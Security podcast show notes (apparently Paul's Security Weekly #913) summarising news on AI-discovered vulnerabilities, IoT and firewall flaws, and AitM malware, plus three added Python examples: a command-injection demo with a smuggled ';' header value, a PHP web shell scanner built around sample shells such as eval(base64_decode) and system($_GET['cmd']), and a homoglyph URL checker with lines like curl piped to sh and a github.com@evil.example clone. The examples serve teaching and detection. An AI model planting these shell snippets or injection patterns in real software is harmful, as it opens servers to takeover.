AI Vulnerability Hunting – PSW #913
In the security news:
- Viral AI prompts
- Things to do in your home security lab
- I can open your garage door
- They call me DKnife
- Beyondtrust RCE
- Cool AI device
- Robots need your body
- Meta is just full of scams, phishing, and malware
- Claude Opus 4.6 found more than 500 high-severity vulnerabilities
- Arista next gen firewalls and command injection
- Secure Boot updates
- The RCE AMD won't fix and why the article went away
- End of support means get it off the network
- Accidentally giving away $44 billion of Bitcoin
Security Weekly listeners save $100 on their RSAC 2026 All Access Pass! RSAC 2026 Conference will take place March 23rd to March 26th in San Francisco. To register using our discount code, please visit securityweekly.com/rsac26 and use the code 56U5SECWEEKLY! We hope to see you there!
Most security conferences talk about threats. Zero Trust World lets you attack them. From March 4th to 6th, 2026 in Orlando, Florida, this hands-on cybersecurity event features live hacking labs where you’ll break real environments, think like an adversary, and learn how attacks really work. You’ll also get expert sessions, real-world case studies, CPE credits, and networking with top practitioners. And yes — the Security Weekly team will be there too. Don’t miss it! Register today at securityweekly.com/ZTW.
Paul Asadoorian
- Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
- We hid backdoors in binaries — Opus 4.6 found 49% of them – Quesma Blog
- The RCE that AMD won’t fix!
So, this article has been taken down, likely by request of AMD. What the researcher found is something that I have also observed in the past. When software or firmware does its automatic update process it can reach out to multiple URLs. Perhaps one URL is queried to see if there is an update. If there is an update it receives a list of URLs where it can retrieve the update. The other URLs may not be HTTPS. If it's HTTP, it is trivial for an attacker to perform AiTM attacks. If the updates are not cryptographically signed, it means attackers now control the software and firmware on your system. This seems to be cropping up more and more...
- GitHub – BrownFineSecurity/iothackbot: IoT HackBot: A collection of Claude Skills and custom tooling for hybrid IoT pentesting
"IoTHackBot is a collection of specialized tools and Claude Code skills designed for security testing of IoT devices, IP cameras, and embedded systems. It provides both command-line tools and AI-assisted workflows for comprehensive IoT security assessments." - I expect to see more of this as researchers are using Claude code to develop workflows and analyze binaries, web apps, firmware, etc...
- Advanced Web Shell Detection and Prevention
Interesting Linux-based detection for PHP web shells, will probably detect some low hanging fruit and less sophisticated attackers, but cool nonetheless: "The article explains how CrowdStrike’s Linux Falcon sensor adds new capabilities to spot and stop stealthy web shells on Linux servers and containers, especially obfuscated and pre-existing PHP shells."
- Zero Day Initiative — CVE-2025-6978: Arbitrary Code Execution in the Arista NG Firewall
Ah, good ol' command injection when parsing an HTTP header value. I feel like I have seen this several times before in other codebases (BMCs perhaps?). Also, I did not know that the Arista NG Firewall was previously "Untangle". Basically, another Linux-based appliance has a poorly protected web management application. Command injection on these platforms is dangerous for many reasons:
- It just works - Unlike memory corruption vulnerabilities, command injections are ubiquitous. They work on all different architectures and deployments. It does not require ROP chains or platform-specific payloads, you just get to execute commands!
- Typically the processes you are injecting are running as root, so you don't even need privilege escalation
- Even if you had memory protections and a hardened Linux system underneath, command injection may still work as it is not trying to manipulate memory. This also means you can code it in Rust, and if it has a command injection, it will likely work just fine
- AI Pyramid Computing Box 4GB Version (AX8850)
This is the coolest looking AI device! I want one!
- GitHub – cfinke/EpsteIn: See which of your LinkedIn connections appear in the Epstein files.
In case you want to check your friends list... Side note: One of my favorite items in the Epstein dump is a picture of a laptop, and on the bottom there is a Windows 10 product key. According to some, it still works... See if you can find it!
- Remote code execution in Beyondtrust Remote Support (RS) and Privileged Remote Access (PRA)
This seems bad, wasn't this Bomgar? "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user."
- 0-Days red.anthropic.com
Do you believe this? - "Claude Opus 4.6 can find meaningful 0-day vulnerabilities in well-tested codebases, even without specialized scaffolding. Our results show that language models can add real value on top of existing discovery tools. The Safeguards work we describe above is essential to managing the dual-use risk this creates."
- Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework
This looks awesome, where do I get a copy?
- DKnife is a gateway‑monitoring and AitM framework made up of seven Linux‑based implants designed to run on network edge gear.
- The implants support deep packet inspection, traffic redirection and modification, and on‑device malware delivery, rather than just using the device as a simple pivot.
- Artifact metadata indicates use since at least 2019, with active C2 infrastructure observed as of January 2026.
- The framework performs DPI on passing traffic, harvests credentials, and selectively tampers with sessions, enabling transparent AitM on PCs, mobile, and IoT devices behind the edge device.
- It can hijack binary downloads and Android app updates to deliver and manage ShadowPad and DarkNimbus backdoors, effectively turning routine software updates into a delivery channel.
- The tooling includes exfiltration modules tailored to popular Chinese mobile applications and support for long‑term monitoring rather than smash‑and‑grab operations.
- From Fallout to Retro: How to give your Linux bootloader a total makeover
In case you've ever wanted a custom skin on your GRUB bootloader screen, here's how to do it.
- Your code is now a security sensor
"trappsec is an open-source framework that helps developers detect attackers who probe API business logic. By embedding realistic decoy routes and honey fields that are difficult to distinguish from real API constructs, attackers are nudged to authenticate — converting reconnaissance into actionable security telemetry." - Codebases are complex enough, let alone trying to figure out which API endpoints are traps and which ones are legit. However, could be neat to implement!
- Shelly IoT door controller config fail: leaving your garage, home and security exposed
Wow, this is pretty bad:
- Issue: Shelly Gen 4 devices expose an open (unauthenticated) Wi-Fi access point used for initial setup—but unlike earlier Shelly generations, the AP can remain enabled even after the device is joined to your normal Wi-Fi network, which the author frames as a security regression.
- Why it matters: Anyone within Wi-Fi range can connect to the device’s AP and control the relay, including for garage doors/gates/doors, creating a direct physical-security risk. The post gives an example unauthenticated request that can trigger the relay (open/activate).
- klint – Linux Kernel Security Scanner
Neat tool, still trying to understand the results...
- What to Do with Your First Home Lab
Not much detail here, was hoping for a little more meat. In terms of things you can do with your home lab:
- Find vulnerabilities in anything that runs firmware in your lab, find the firmware and reverse it, then look for bugs, then test them live on your gear
- Make sure you have Windows Active Directory, you will need to learn how this works and how to break it
- Give yourself some web applications, then use the free version of Burp to find vulnerabilities
- Build an AiTM gateway, all traffic from the lab should go through this gateway. Have this device control DHCP/DNS, then implement AiTM attacks and inspect traffic for things like DNS requests and devices trying to update
- Run Linux KVM/libvirt - Get an older computer, put Linux on it, enable Virtualization in the CPU via BIOS, then start spinning up targets. This is a good learning experience and I will likely do a tech segment on it. Make sure you have LOTS of disk space on this computer...
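The Arista NG Firewall item above is command injection from an HTTP header value. The following is an added example, not code from the show notes, from Arista, or from the ZDI write-up: a constructed request and a made-up `X-Target` header feed a diagnostic command, once the vulnerable way (header spliced into a shell string) and once with an argv list plus an allow-list. `echo` stands in for whatever tool the appliance really runs.

```python
import re
import subprocess

# Constructed raw request for the example. The X-Target header name is an
# assumption and is not the header from the Arista advisory.
SAMPLE_REQUEST = (
    b"GET /admin/diag HTTP/1.1\r\n"
    b"Host: fw.example.internal\r\n"
    b"X-Target: 10.0.0.1; echo INJECTED\r\n"
    b"\r\n"
)


def header_value(raw: bytes, name: str) -> str:
    """Return the first value of header `name` from a raw HTTP/1.1 request."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        key, sep, value = line.partition(b":")
        if sep and key.strip().lower() == name.lower().encode():
            return value.strip().decode("latin-1")
    raise KeyError(name)


def vulnerable_run(target: str) -> str:
    """Anti-pattern: the header value is spliced into a shell command string.
    With shell=True the ';' ends the intended command and the rest runs too,
    as the user the web app runs as (often root on an appliance)."""
    return subprocess.run(f"echo {target}", shell=True,
                          capture_output=True, text=True).stdout


def argv_run(target: str) -> str:
    """No shell: the value is one argv element, so ';', '|', '$(...)' are
    passed to the program literally and nothing else executes."""
    return subprocess.run(["echo", target], capture_output=True, text=True).stdout


# Allow-list for a hostname or IPv4 literal, checked before any subprocess.
TARGET_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def hardened_run(target: str) -> str:
    """Reject anything that is not a plausible host, then use argv form."""
    if not TARGET_RE.fullmatch(target):
        raise ValueError(f"rejected target {target!r}")
    return argv_run(target)


if __name__ == "__main__":
    t = header_value(SAMPLE_REQUEST, "X-Target")
    print("vulnerable:", repr(vulnerable_run(t)))   # '10.0.0.1\nINJECTED\n'
    print("argv only :", repr(argv_run(t)))         # one literal line
    try:
        hardened_run(t)
    except ValueError as err:
        print("hardened  :", err)
```

The argv form alone already stops the injection, which is the point made above about command injection not caring about the language or memory protections: the bug is in how the string reaches a shell, not in the runtime. The allow-list is still worth having, because the argument can also be abused inside the tool itself (for example option injection with a leading `-`).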
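For the PHP web shell detection item above, here is an added example of the kind of indicator scan that catches the "low hanging fruit" mentioned. It is not CrowdStrike's logic and not from the article; the PHP samples are constructed for the example. The one thing it does beyond grepping is decode `base64_decode('...')` arguments and rescan the decoded text, which is how `@eval(base64_decode(...))` droppers usually hide a plain `system($_GET[...])`.

```python
import re
from base64 import b64decode, b64encode

# Constructed PHP samples (not from the article). The encoded payload is
# built here so the example is self-checking.
_PAYLOAD = b64encode(b"system($_GET['cmd']);").decode()
SAMPLES = {
    "index.php": "<?php require 'config.php'; echo render_page($_GET['page'] ?? 'home');",
    "cache.php": f"<?php @eval(base64_decode('{_PAYLOAD}'));",
    "upload.php": "<?php $f = $_POST['f']; system($f);",
    "img.php": "<?php $x = \"sys\" . \"tem\"; $x($_REQUEST['c']);",
}

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)"
RULES = [
    # direct OS command execution
    ("dangerous-call", re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(")),
    # eval of decoded/inflated data is the classic dropper shape
    ("eval-decoded", re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # '@' suppresses the errors a broken shell would otherwise log
    ("suppressed-eval", re.compile(r"@\s*eval\s*\(")),
    # $x($_GET[...]) : variable function fed straight from request input
    ("variable-function-with-input", re.compile(r"\$\w+\s*\(\s*" + SUPERGLOBAL)),
    # "sys"."tem" : function name split to dodge string matching
    ("split-call-name", re.compile(r"[\"'](?:sys|ex|she|pass|ev)[\"']\s*\.\s*[\"']", re.I)),
]
B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def scan(src: str, depth: int = 0) -> list[str]:
    """Return the names of matching rules; decoded payload hits are prefixed."""
    hits = [name for name, rx in RULES if rx.search(src)]
    if depth < 2:                                  # bounded recursion
        for m in B64_ARG.finditer(src):
            try:
                inner = b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                continue
            hits += [f"decoded:{h}" for h in scan(inner, depth + 1)]
    return hits


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    return {name: scan(src) for name, src in files.items()}


if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        print(f"{name:12} {'CLEAN' if not hits else ', '.join(hits)}")
```

Run it over a web root and anything with a `decoded:` hit or more than one rule is worth a human look; a single `dangerous-call` on its own is common in legitimate admin scripts, which is why a sensor that also sees the process tree (a PHP worker spawning `sh`) has the edge over static matching.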
Sam Bowne
- The rise of Moltbook suggests viral AI prompts may be the next big security threat
OpenClaw is also a security nightmare. Researchers at Simula Research Laboratory have identified 506 posts on Moltbook (2.6 percent of sampled content) containing hidden prompt-injection attacks. Cisco researchers documented a malicious skill called “What Would Elon Do?” that exfiltrated data to external servers, while the malware was ranked as the No. 1 skill in the skill repository. The skill’s popularity had been artificially inflated.
Security researchers have already predicted the rise of self-replicating adversarial prompts among networks of AI agents. You might call it a “prompt worm” or a “prompt virus.” They’re self-replicating instructions that could spread through networks of communicating AI agents.
- New Site Lets AI Rent Human Bodies
RentAHuman.ai is a platform for AI agents to “search, book, and pay humans for physical-world tasks.” The pitch is simple: “robots need your body.”
- Nearly one in three Meta ads found to point to a scam, phishing or malware
Ads have quietly become one of the most efficient delivery mechanisms for scams, phishing and malware. Today, dangerous ads don’t look suspicious; they look professional, familiar and seem to target your exact needs.
- FBI Couldn’t Get into WaPo Reporter’s iPhone Because It Had Lockdown Mode Enabled
Lockdown Mode is a sometimes overlooked feature of Apple devices that broadly makes them harder to hack. A court record indicates the feature might be effective at stopping third parties from unlocking someone's device. At least for now.
- Microsoft rolls out native Sysmon monitoring in Windows 11
Microsoft has started rolling out built-in Sysmon functionality to some Windows 11 systems enrolled in the Windows Insider program. Although Sysmon is now natively supported in Windows, it's disabled by default, and users must explicitly enable it.
- New York Is the Latest State to Consider a Data Center Pause
Red and blue states alike have introduced legislation in recent weeks that would halt data center development, citing concerns from climate to high energy prices.
- Evaluating and mitigating the growing risk of LLM-discovered 0-days
Claude Opus 4.6 found more than 500 high-severity vulnerabilities, some that had gone undetected for decades. It performed fuzzing, manual analysis, and then inspected Git commits addressing memory corruption and use of dangerous functions like strstr.
- Secure Boot playbook for certificates expiring in 2026
PCs manufactured before 2024 will need to install the 2023 Secure Boot CAs before the 2011 CAs start expiring in June of 2026. Regular Windows updates should deliver the CA.
- South Korean crypto firm accidentally sends $44 billion in bitcoins to users
The exchange had planned to distribute small cash rewards of 2,000 Korean won ($1.40) or more to each user as part of a promotional event, but winners received at least 2,000 bitcoins each instead.
- New tool blocks imposter attacks disguised as safe commands
Homoglyph attacks use foreign characters that look like English characters in a CLI. Tirith can detect homoglyph attacks over command-line environments by analyzing URLs in typed commands and stopping their execution.
- BOD 26-02: Mitigating Risk From End-of-Support Edge Devices
CISA issued a binding directive to federal agencies that requires phasing out EOS edge devices.
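For the Tirith homoglyph item above, here is an added example (not Tirith's code, not from the article) of how a shell hook can vet the URLs in a typed command before it runs: pull out URL tokens, take the host apart by hand so nothing is normalized away, and flag lookalike characters by Unicode script, invisible code points, and the `user@host` trick. The sample commands are constructed.

```python
import re
import unicodedata

URL_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://[^\s'\"<>|;&]+")


def host_of(url: str) -> tuple[str, bool]:
    """Return (host, has_userinfo). Parsed by hand so odd code points survive as typed."""
    authority = url.split("://", 1)[1]
    for sep in "/?#":
        authority = authority.split(sep, 1)[0]
    has_userinfo = "@" in authority            # https://github.com@evil.example/
    authority = authority.rsplit("@", 1)[-1]
    if authority.startswith("["):               # bracketed IPv6 literal
        return authority[1:authority.find("]")], has_userinfo
    return authority.split(":", 1)[0], has_userinfo


def script_of(ch: str) -> str:
    """Rough script bucket from the Unicode name: LATIN, CYRILLIC, GREEK, ..."""
    if ch.isascii():
        return "LATIN" if ch.isalpha() else "COMMON"
    name = unicodedata.name(ch, "")
    return name.split()[0] if name else "UNKNOWN"


def check_host(host: str, has_userinfo: bool) -> list[tuple[str, str]]:
    """Findings as (severity, message); 'block' means do not run the command."""
    findings, scripts = [], set()
    if has_userinfo:
        findings.append(("block", "userinfo before host: what you read is not where it connects"))
    for ch in host:
        cp = f"U+{ord(ch):04X}"
        if unicodedata.category(ch) in ("Cf", "Mn", "Me", "Cc"):
            findings.append(("block", f"invisible/combining {cp} {unicodedata.name(ch, '?')}"))
            continue
        if not ch.isascii():
            findings.append(("warn", f"non-ASCII {ch!r} {cp} {unicodedata.name(ch, '?')}"))
        s = script_of(ch)
        if s != "COMMON":
            scripts.add(s)
    if len(scripts) > 1:                        # Latin 'a' next to Cyrillic 'а'
        findings.append(("block", "mixed scripts in host: " + ", ".join(sorted(scripts))))
    return findings


def check_command(cmd: str) -> list[dict]:
    """Report every URL in the command that has at least one finding."""
    results = []
    for m in URL_RE.finditer(cmd):
        url = m.group(0)
        host, has_userinfo = host_of(url)
        findings = check_host(host, has_userinfo)
        if findings:
            try:
                idna = host.encode("idna").decode("ascii")   # what DNS actually sees
            except UnicodeError:
                idna = "<not encodable>"
            results.append({"url": url, "host": host, "idna": idna, "findings": findings})
    return results


def should_block(cmd: str) -> bool:
    return any(sev == "block" for r in check_command(cmd) for sev, _ in r["findings"])


if __name__ == "__main__":
    for cmd in ["curl -fsSL https://example.com/install.sh | sh",
                "curl https://ex\u0430mple.com/setup.sh",          # Cyrillic a
                "wget https://exam\u200bple.com/x",                 # zero-width space
                "git clone https://github.com@evil.example/r.git"]:
        print(should_block(cmd), check_command(cmd))
```

A pure single-script IDN such as `bücher.de` only produces a `warn`, so the hook does not break people who legitimately type non-ASCII hostnames; mixed scripts, invisible characters and userinfo are where a plain block is the right default. The `idna` field is what to show the user, since the Punycode form is how the lookalike actually resolves.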